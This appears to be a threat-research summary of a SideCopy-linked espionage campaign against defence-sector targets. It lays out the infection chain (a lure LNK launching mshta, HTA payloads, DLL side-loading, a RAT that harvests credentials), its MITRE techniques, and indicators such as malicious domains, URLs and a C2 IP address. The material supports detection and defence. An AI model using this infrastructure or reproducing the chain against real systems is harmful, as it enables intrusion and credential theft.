Threat Research

Clean Rooms, Nuclear Missiles, and SideCopy, Oh My! | FortiGuard Labs

Securonix

Fortinet researchers detail a SideCopy-linked operation that uses decoys and HTA-based payloads to deploy a multi-stage Windows malware chain aimed at defense-sector targets. The campaign blends phishing, LOL decoys, DLL side-loading, in-memory execution, and C2 communications to control the victim and harvest credentials. #SideCopy #PantomimeHTA #SILENTTRINITY #DRDO #K4Missile #TransparentTribe

Keypoints

  • The initial infection vector is suspected to be a phishing e-mail, with a ZIP named “DRDO-K4-Missile-Clean-room.zip” involved.
  • The ZIP contains decoys and a malicious LNK file (“DRDO-K4 Missile Clean room.pptx.lnk”) designed to resemble a PPTX to lure victims.
  • The LNK uses mshta.exe to reach out to a remote domain and download a payload (Pantomime.hta).
  • The campaign leverages SILENTTRINITY to generate payloads and execute .NET code without PowerShell as an intermediate step.
  • Encoded and obfuscated payloads are decoded and loaded in memory (e.g., “hta.dll” deserializes and runs “PreBot.dll”).
  • Dropper and RAT stages deploy via DLL side-loading (DUser.dll loaded by cridviz.exe) and culminate in a Windows RAT that communicates with C2 infrastructure.
  • The RAT uses a distinctive user-agent and HTTP/TCP channels for C2, and includes credential access via Windows Credential Manager (credwiz) and WMI-based antivirus discovery.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – The initial infection vector is suspected to be a phishing e-mail. ‘The initial infection vector is suspected to be a phishing e-mail.’
  • [T1036] Masquerading – The Windows shortcut file DRDO-K4 Missile Clean room.pptx.lnk masquerades as a PPTX; ‘The Windows shortcut file does not open a PowerPoint file (at least immediately)…’
  • [T1218.005] Mshta – The LNK uses mshta.exe to reach out to a domain controlled by the attacker and download Pantomime.hta. ‘…reach out to a domain controlled by the attacker using the utility for Microsoft HTML Applications (HTAs), or “mshta.exe”.’
  • [T1574.002] DLL Side-Loading – DUser.dll is dropped in the same directory as cridviz.exe to be loaded by it and executed. ‘sideloading to load its code into memory via dropping the malicious DLL “DUser.dll” in the directory with “cridviz.exe”.’
  • [T1055] Process Injection / In-Memory Execution – The newly decoded payloads are deserialized and executed in memory (e.g., ‘punctureTyres’ decoded and deserialized to run ‘PreBot.dll’).
  • [T1555.003] Credentials in Windows Credential Manager – The RAT utilizes the Windows Credential Manager via “Credential Backup and Restore Wizard” to access credentials. ‘The Windows Credential Manager to provide a method for backing up and restoring saved credentials on the system.’
  • [T1047] Windows Management Instrumentation – The decoded base64 block queries antivirus information via WMI (e.g., ‘Select * From AntiVirusProduct’).
  • [T1105] Ingress Tool Transfer – The payload is downloaded from remote servers (e.g., jquery.txt and jquery.hta). ‘getThirdStrike… to download file jquery.hta from cornerstonebeverly.org/js/files/ntfonts/jquery.txt’.
  • [T1071.001] Web Protocols – The RAT communicates using HTTP and TCP with a distinct user-agent. ‘The RAT can communicate over TCP using raw sockets or via HTTP.’
  • [T1041] Exfiltration Over C2 Channel – Antivirus status and other data is posted to C2 endpoints. ‘via HTTP POST through the “pkg.infinity” function, which will reach out to cornerstonebeverly.org/js/files/ntfonts/avena/’.
  • [T1574.002] DLL Side-Loading – Additional dependencies are loaded by cridviz.exe through dropping DUser.dll in its directory, enabling the RAT to load in memory. ‘sideloading to load its code into memory… by dropping the malicious DLL “DUser.dll” in the directory with “cridviz.exe”.’

Indicators of Compromise

  • [File] Context – DRDO-K4-Missile-Clean-room.zip (SHA256: 9aed0c5a047959ef38ec0555ccb647688c67557a6f8f60f691ab0ec096833cce), pantomime.hta (SHA256: e88835e21c431d00a9b465d2e8bed746b6369892e33be10bc7ebbda6e8185819)
  • [File] Context – DRDO – K4 Missile Clean room.pptx.lnk (SHA256: a2e55cbd385971904abf619404be7ee8078ce9e3e46226d4d86d96ff31f6bb9a), jquery.hta (SHA256: 85faf414ed0ba9c58b9e7d4dc7388ba5597598c93b701d367d8382717fb485ec)
  • [Domain] cornerstonebeverly.org – HTA file downloads / C2 endpoints
  • [URL] hXXp://cornerstonebeverly.org/js/files/docufentososo/doecumentosoneso/pantomime.hta – Payload download
  • [URL] https://cornerstonebeverly.org/js/files/ntfonts/avena/ – C2
  • [URL] hXXp://cornerstonebeverly.org/js/files/ntfonts/jquery.txt – Additional payload download
  • [IP] 144.91.72.17:8080 – C2 server for DUser.dll
  • [IP] 144.91.72.17:8080/user_details – C2-related data capture

Read more: https://www.fortinet.com/blog/threat-research/clean-rooms-nuclear-missiles-and-sidecopy

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint